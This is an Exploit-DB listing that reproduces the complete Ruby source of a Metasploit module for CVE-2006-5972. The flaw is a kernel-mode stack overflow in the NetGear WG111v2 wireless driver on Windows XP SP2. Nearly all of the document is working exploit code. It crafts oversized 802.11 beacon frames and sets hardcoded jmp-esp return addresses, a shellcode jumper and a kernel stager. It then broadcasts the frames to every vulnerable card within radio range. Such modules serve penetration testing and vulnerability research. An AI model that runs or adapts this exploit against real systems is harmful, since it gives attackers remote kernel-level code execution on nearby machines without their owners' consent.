Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)

EDB-ID:

16388




Platform:

Hardware

Date:

2010-07-03


##
# $Id: netgear_wg111_beacon.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = LowRanking

	include Msf::Exploit::Lorcon2
	include Msf::Exploit::KernelMode

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NetGear WG111v2 Wireless Driver Long Beacon Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the NetGear WG111v2 wireless
				device driver. This stack buffer overflow allows remote code execution in kernel mode.
				The stack buffer overflow is triggered when a 802.11 Beacon frame is received that
				contains more than 1100 bytes worth of information elements.

				This exploit was tested with version 5.1213.6.316 of the WG111v2.SYS driver and
				a NetGear WG111v2 USB adapter. Since this vulnerability is exploited via beacon frames,
				all cards within range of the attack will be affected. The tested adapter used
				a MAC address in the range of 00:18:4d:02:XX:XX.

				Vulnerable clients will need to have their card in a non-associated state
				for this exploit to work. The easiest way to reproduce this bug is by starting
				the exploit and then unplugging and reinserting the USB card. The exploit can
				take up to a minute to execute the payload, depending on system activity.

				NetGear was NOT contacted about this flaw. A search of the SecurityFocus
				database indicates that NetGear has not provided an official patch or
				solution for any of the thirty flaws listed at the time of writing. This list
				includes BIDs: 1010, 3876, 4024, 4111, 5036, 5667, 5830, 5943, 5940, 6807, 7267, 7270,
				7371, 7367, 9194, 10404, 10459, 10585, 10935, 11580, 11634, 12447, 15816, 16837,
				16835, 19468, and 19973.

				This module depends on the Lorcon2 library and only works on the Linux platform
				with a supported wireless card. Please see the Ruby Lorcon2 documentation
				(external/ruby-lorcon/README) for more information.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					['CVE', '2006-5972'],
					['OSVDB', '30473'],
					['URL', 'http://projects.info-pull.com/mokb/MOKB-16-11-2006.html'],
				],
			'Privileged'     => true,

			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					# Its a beautiful day in the neighborhood...
					'Space'  => 1000,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Windows XP SP2 with the latest updates
					# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
					[ 'Windows XP SP2 (5.1.2600.2122), WG111v2.SYS 5.1213.6.316',
						{
							'Ret'      => 0x80502d7f, # jmp esp
							'Platform' => 'win',
							'Payload'  =>
							{
								'ExtendedOptions' =>
								{
									'Stager'       => 'sud_syscall_hook',
									'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
									'Recovery'     => 'idlethread_restart',
									'KiIdleLoopAddress' => 0x804dbb27,
								}
							}
						}
					],

					# Windows XP SP2 install media, no patches
					# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
					[ 'Windows XP SP2 (5.1.2600.2180), WG111v2.SYS 5.1213.6.316',
						{
							'Ret'      => 0x804ed5cb, # jmp esp
							'Platform' => 'win',
							'Payload'  =>
							{
								'ExtendedOptions' =>
								{
									'Stager'       => 'sud_syscall_hook',
									'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
									'Recovery'     => 'idlethread_restart',
									'KiIdleLoopAddress' => 0x804dc0c7,
								}
							}
						}
					]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Nov 16 2006'))

		register_options(
			[
				OptString.new('ADDR_DST', [ true,  "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
				OptInt.new('RUNTIME', [ true,  "The number of seconds to run the attack", 60])
			], self.class)
	end

	def exploit
		open_wifi

		stime = Time.now.to_i
		rtime = datastore['RUNTIME'].to_i
		count = 0

		print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
		while (stime + rtime > Time.now.to_i)
			wifi.write(create_beacon)
			select(nil, nil, nil, 0.10) if (count % 100 == 0)

			count += 1

			# Exit if we get a session
			break if session_created?
		end

		print_status("Completed sending beacons.")
	end

	# Convert arbitrary data into a series of information elements
	def ie_padding(data)
		ret = 0
		idx = 0
		len = 0

		while(idx < data.length)
			len = data[idx+1]
			if (! len)
				data << "\x00"
				len = 0
			end

			idx += len + 2
		end

		data << yield(idx - data.length)
	end

	def create_beacon

		ssid   = rand_text_alphanumeric(16)
		bssid  = ("\x00" * 2) + rand_text(4)
		src    = ("\x00" * 2) + rand_text(4)
		seq    = [rand(255)].pack('n')
		stamp  = rand_text(8)

		frame =
			"\x80" +                      # type/subtype
			"\x00" +                      # flags
			"\x00\x00" +                  # duration
			eton(datastore['ADDR_DST']) + # dst
			src +                         # src
			bssid +                       # bssid
			seq   +                       # seq
			stamp +                       # timestamp value
			"\x64\x00" +                  # beacon interval
			rand_text(2) +      # capability flags

			# ssid tag
			"\x00" + ssid.length.chr + ssid +

			# supported rates
			"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +

			# current channel
			"\x03" + "\x01" + channel.chr

		# Bounce through EDI to the uncorrupted payload
		jumper =
			"\x6a\x39" + # push byte +0x39
			"\x58"     + # pop eax
			"\x01\xc7" + # add edi, eax
			"\xff\xe7"   # jmp edi

		# Overwrite enough to pop the return
		buf = rand_text(1160)

		# Kernel-mode stager fun goes here
		buf[0, payload.encoded.length] = payload.encoded

		# Return address is a jmp ESP
		buf[1101, 4] = [ target.ret ].pack('V')

		# Jump back to EDI + 0x39
		buf[1113, jumper.length] = jumper

		# Pad it out to be a valid set of IEs
		frame << ie_padding(buf) {|c| rand_text(c) }

		return frame
	end

end